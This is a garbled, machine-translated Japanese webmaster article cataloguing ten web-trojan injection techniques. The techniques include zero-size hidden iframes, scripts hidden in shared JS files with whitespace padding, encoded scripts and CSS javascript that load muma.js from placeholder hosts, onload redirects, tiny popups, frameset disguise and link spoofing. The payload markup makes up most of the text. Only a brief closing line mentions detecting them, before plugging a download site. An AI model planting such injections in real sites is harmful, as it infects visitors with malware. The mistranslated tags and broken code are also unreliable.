1:フレームハングホース
<iframe src = addresswidth = 0 height = 0> </iframe>
その中で、悪意のあるウェブサイトのリンクは「アドレス」に入力できます
2:JSファイルハング
JSファイルである限り、悪意を持って変更され、悪意のあるコードを掛けることができます。一般的に、サイト全体で参照されるJSコードは、トロイの木馬に掛けられる可能性が最も高くなります。 JSコードの左または下部を確認できます。不良者は、多くのスペースまたはキャリッジリターンで悪意のあるコードと通常のコードを非表示にするのが好きなので、JSコードページが意図的に延長されているなどを確認する必要があります。
3:JS変形暗号化
<スクリプト言語= "jscript.encode" src = http://www.xxx.com/muma.txt> </script>
muma.txtは任意のサフィックスに変更できます
4:体は馬を吊るします
<body onload = "window.location = 'address';"> </body>
5:見えない馬を隠す
top.document.body.innerhtml = top.document.body.innerhtml + '/r/n <iframe src = "http://www.xx.com/muma.htm/"> </iframe>';
6:CSSハングホース
体 {
background-image:url( 'javascript:document.write( "<script src = http://www.xxx.net/muma.js> </script>")}}
この方法はより冷酷で、見つけるのが難しいです。
セブン:ジャジャハングホース
<スクリプト言語= javascript>
window.open( "address"、 ""、 "toolbar = no、no、no、no、directories = no、no、menubar = no、scro llbars = no、width = 1、height = 1");
</script>
8:写真の変装
<html>
<iframe src = "博题题题题" height = 0 width = 0> </iframe>
<img src = "画像アドレス"> </center>
</html>
9:変装した呼び出し
<フレームセットrows = "444,0" cols = "*">
<frame src = "open webpage" frameborder = "no" scrolling = "auto" norsize marginwidth = "0" margingheight = "0">
<frame src = "net horseアドレス" frameborder = "no" scrolling = "no" noresize marginwidth = "0" margingheight = "0">
</frameset>
10:高度な欺ception
<a href = "http://www.163.com(接続アドレスを混乱させ、このアドレスをトロイの木馬アドレスに表示する)" onmouseover = "www_163_com(); return true;">ページに表示する</a>
<スクリプト言語= "javascript">
関数www_163_com()
{
var url = "博题题题题题题";
open(url、 "newWindow"、 "Toolbar = no、no、no、no、directories = no、no、menubar = no、no、no、resizable = no、copyhistory = yes、width = 800、height = 600、left = 10、top = 10");
}
</script>
上記の動作を発見する方法は?複数のページに馬コードがある場合は、バッチ交換ツールが必要です。使用することをお勧めします。
新しいWebmasterサイトのサーバーチャネルのいくつかのダウンロード(より多くのソフトウェアはs.vevb.comでダウンロードできます)